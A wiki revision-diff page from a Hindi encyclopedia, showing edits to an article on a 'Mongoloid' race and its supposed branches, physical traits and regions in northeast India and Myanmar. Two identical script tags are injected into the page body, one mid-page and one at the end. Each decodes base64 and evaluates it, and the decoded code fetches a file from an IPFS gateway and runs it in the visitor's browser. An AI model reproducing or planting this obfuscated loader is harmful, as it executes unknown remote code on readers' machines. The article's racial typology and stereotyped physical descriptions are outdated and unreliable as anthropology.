Difference between revisions of "मंगोलॉयड"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
;मंगोलॉयड / Mongoloid  
+
'''मंगोलॉयड''' ([[अंग्रेज़ी]]:''Mongoloid'') एक प्रजाति है। गुहा ने इस प्रजाति की दो शाखाओं का उल्लेख किया है।
{{tocright}}
+
गुहा ने इस प्रजाति की दो शाखाओं का उल्लेख किया है।  
 
 
*प्रथम प्राचीन मंगोलॉयड, जिनके दो भेद हैं - लम्बे सिर वाले एवं चौड़े सिर वाले। लम्बे सिर वाले मंगोलॉयड [[असम|असोम]] और सीमान्त प्रान्तों में पाये जाते हैं तथा चौड़े सिर वाले 'चटगाँव' और [[म्यांमार]] में पाये जाते हैं।  
 
*प्रथम प्राचीन मंगोलॉयड, जिनके दो भेद हैं - लम्बे सिर वाले एवं चौड़े सिर वाले। लम्बे सिर वाले मंगोलॉयड [[असम|असोम]] और सीमान्त प्रान्तों में पाये जाते हैं तथा चौड़े सिर वाले 'चटगाँव' और [[म्यांमार]] में पाये जाते हैं।  
 
*इनकी दूसरी शाखा तिब्बती मंगोलॉयड हैं, जो [[सिक्किम]] और [[भूटान]] में अधिक पाई जाती है।  
 
*इनकी दूसरी शाखा तिब्बती मंगोलॉयड हैं, जो [[सिक्किम]] और [[भूटान]] में अधिक पाई जाती है।  
 
;शारीरिक लक्षण
 
;शारीरिक लक्षण
मंगोलॉयड के प्रमुख शारीरिक लक्षण हैं - छोटी नाक, मोटे होंठ, लम्बे व चौड़े सिर, गालों की हड्डियाँ उभरी हुईं, चेहरा चपटा, त्वचा का रंग पीला या भूरा। इस प्रजाति के तत्त्व मीरी, नागा, बोडो तथा [[बंगाल]] तथा असोम के लोगों में भी पाये जाते हैं।
+
मंगोलॉयड के प्रमुख शारीरिक लक्षण हैं - छोटी नाक, मोटे होंठ, लम्बे व चौड़े सिर, गालों की हड्डियाँ उभरी हुईं, चेहरा चपटा, त्वचा का रंग पीला या भूरा। इस प्रजाति के तत्त्व मीरी, [[नागा]], बोडो तथा [[बंगाल]] तथा असोम के लोगों में भी पाये जाते हैं।
 
;विशेषताएँ
 
;विशेषताएँ
*नाटे कद, चौड़े सिर, चपटी नाक एवं दरार जैसी आंखों वाली यह जाति [[सिक्किम]], [[असम]], [[भूटान]] एवं भारत तथा [[म्यांमार|बर्मा]] की सीमा पर आज भी दृष्टिगोचर होती है।
+
*नाटे कद, चौड़े सिर, चपटी नाक एवं दरार जैसी आंखों वाली यह जाति [[सिक्किम]], [[असम]], [[भूटान]] एवं भारत तथा बर्मा (वर्तमान [[म्यांमार]]) की सीमा पर आज भी दृष्टिगोचर होती है।
  
  
Line 20: Line 19:
 
{{जातियाँ और जन जातियाँ}}
 
{{जातियाँ और जन जातियाँ}}
 
[[Category:जातियाँ और जन जातियाँ]]
 
[[Category:जातियाँ और जन जातियाँ]]
[[Category:इतिहास]][[Category:इतिहास_कोश]]
+
[[Category:इतिहास_कोश]]
[[Category:संस्कृति]]
+
[[Category:प्राचीन संस्कृति]]
 
[[Category:संस्कृति कोश]]
 
[[Category:संस्कृति कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:18, 22 January 2013

mangol aauyad (aangrezi:Mongoloid) ek prajati hai. guha ne is prajati ki do shakhaoan ka ullekh kiya hai.

  • pratham prachin mangol aauyad, jinake do bhed haian - lambe sir vale evan chau de sir vale. lambe sir vale mangol aauyad asom aur simant prantoan mean paye jate haian tatha chau de sir vale 'chatagaanv' aur myaanmar mean paye jate haian.
  • inaki doosari shakha tibbati mangol aauyad haian, jo sikkim aur bhootan mean adhik paee jati hai.
sharirik lakshan

mangol aauyad ke pramukh sharirik lakshan haian - chhoti nak, mote hoanth, lambe v chau de sir, galoan ki haddiyaan ubhari hueean, chehara chapata, tvacha ka rang pila ya bhoora. is prajati ke tattv miri, naga, bodo tatha bangal tatha asom ke logoan mean bhi paye jate haian.

visheshataean
  • nate kad, chau de sir, chapati nak evan darar jaisi aankhoan vali yah jati sikkim, asam, bhootan evan bharat tatha barma (vartaman myaanmar) ki sima par aj bhi drishtigochar hoti hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>